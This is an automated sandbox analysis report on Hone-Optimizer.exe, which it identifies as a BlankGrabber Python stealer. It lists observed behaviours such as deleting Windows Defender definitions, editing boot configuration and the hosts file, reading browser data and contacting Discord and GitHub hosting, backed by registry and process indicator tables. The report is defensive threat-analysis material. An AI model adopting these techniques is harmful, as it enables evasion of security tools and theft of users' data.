Analysis Overview
SHA256
07f228e81a538261d88699e099867204dc8fa6ba44590a75bd6c17bf50217b65
Threat Level: Known bad
The file Hone-Optimizer.exe was found to be: Known bad.
Malicious Activity Summary
A stealer written in Python and packaged with Pyinstaller
Blankgrabber family
Deletes Windows Defender Definitions
Modifies boot configuration data using bcdedit
Command and Scripting Interpreter: PowerShell
Boot or Logon Autostart Execution: Active Setup
Event Triggered Execution: Image File Execution Options Injection
Drops file in Drivers directory
Reads user/profile data of web browsers
Checks computer location settings
Loads dropped DLL
Executes dropped EXE
Obfuscated Files or Information: Command Obfuscation
Power Settings
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Enumerates connected drives
Enumerates processes with tasklist
UPX packed file
Launches sc.exe
Hide Artifacts: Ignore Process Interrupts
Drops file in Windows directory
System Location Discovery: System Language Discovery
Enumerates physical storage devices
System Time Discovery
Browser Information Discovery
Modifies registry class
Checks SCSI registry key(s)
Gathers network information
Detects videocard installed
Suspicious use of SetWindowsHookEx
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Modifies registry key
Runs net.exe
Suspicious use of AdjustPrivilegeToken
Kills process with taskkill
Modifies Internet Explorer settings
cURL User-Agent
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-14 11:53
Signatures
A stealer written in Python and packaged with Pyinstaller
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Blankgrabber family
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-14 11:53
Reported
2024-11-14 11:59
Platform
win10ltsc2021-20241023-en
Max time kernel
298s
Max time network
369s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Boot or Logon Autostart Execution: Active Setup
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Active Setup\Installed Components | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe | N/A |
Event Triggered Execution: Image File Execution Options Injection
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions\IoPriority = "3" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions\CpuPriorityClass = "4" | C:\Windows\system32\reg.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\rundll32.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bound.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI22922\rar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Enumerates connected drives
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened (read-only) | \??\D: | N/A | N/A |
| File opened (read-only) | \??\F: | N/A | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | ip-api.com | N/A | N/A |
Obfuscated Files or Information: Command Obfuscation
Power Settings
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Windows\system32\Dism.exe | N/A |
| File opened for modification | C:\Windows\Logs\DISM\dism.log | C:\Users\Admin\AppData\Local\Temp\54FF01A5-1812-4108-8CF6-2226B7F3F407\dismhost.exe | N/A |
| File opened for modification | C:\Windows\Logs\CBS\CBS.log | C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe | N/A |
| File opened for modification | C:\Windows\CbsTemp | C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe | N/A |
Hide Artifacts: Ignore Process Interrupts
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Launches sc.exe
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A |
System Time Discovery
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Capabilities | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID | N/A | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Internet Explorer\GPU | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | N/A | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\es-ES\\VoiceActivation_es-ES.dat" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech Recognition Engine - ja-JP Embedded DNN v11.1" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\ja-JP\\sidubm.table" | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "DebugPlugin" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\fr-FR-N\\L1036" | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech_OneCore\\Voices\\Tokens\\MSTTS_V110_EnUS_ZiraM" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\TTS\\de-DE\\M1031Stefan" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Hedda - German (Germany)" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech Recognition Engine - es-ES Embedded DNN v11.1" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "5218064" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Hortense" | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "- 0001 ! 0002 & 0003 , 0004 . 0005 ? 0006 _ 0007 1 0008 ~ 0009 aa 000a a 000b oh 000c ax 000d b 000e d 000f eh 0010 ey 0011 f 0012 g 0013 hy 0014 uy 0015 iy 0016 k 0017 l 0018 m 0019 n 001a ng 001b nj 001c oe 001d eu 001e ow 001f p 0020 r 0021 s 0022 sh 0023 t 0024 uw 0025 v 0026 w 0027 y 0028 z 0029 zh 002a" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "{E164F996-FF93-4675-BDD8-6C47AB0B86B1}" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech SW Voice Activation - Spanish (Spain)" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\TTS\\it-IT\\M1040Elsa" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech HW Voice Activation - Italian (Italy)" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "23" | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\en-US\\VoiceActivation_HW_en-US.dat" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "SR es-ES Lts Lexicon" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\fr-FR\\VoiceActivation_HW_fr-FR.dat" | N/A | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-870806430-2618236806-3023919190-1000\{4A6C98DF-B751-41E2-B825-2986AFC37D07} | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "002D 002D 0021 0021 0026 0026 002C 002C 002E 002E 003F 003F 005F 005F 002B 002B 002A 002A 02C9 02C9 02CA 02CA 02C7 02C7 02CB 02CB 02D9 02D9 3000 3000 3105 3105 3106 3106 3107 3107 3108 3108 3109 3109 310A 310A 310B 310B 310C 310C 310D 310D 310E 310E 310F 310F 3110 3110 3111 3111 3112 3112 3113 3113 3114 3114 3115 3115 3116 3116 3117 3117 3118 3118 3119 3119 3127 3127 3128 3128 3129 3129 311A 311A 311B 311B 311C 311C 311D 311D 311E 311E 311F 311F 3120 3120 3121 3121 3122 3122 3123 3123 3124 3124 3125 3125 3126 3126" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "HW" | N/A | N/A |
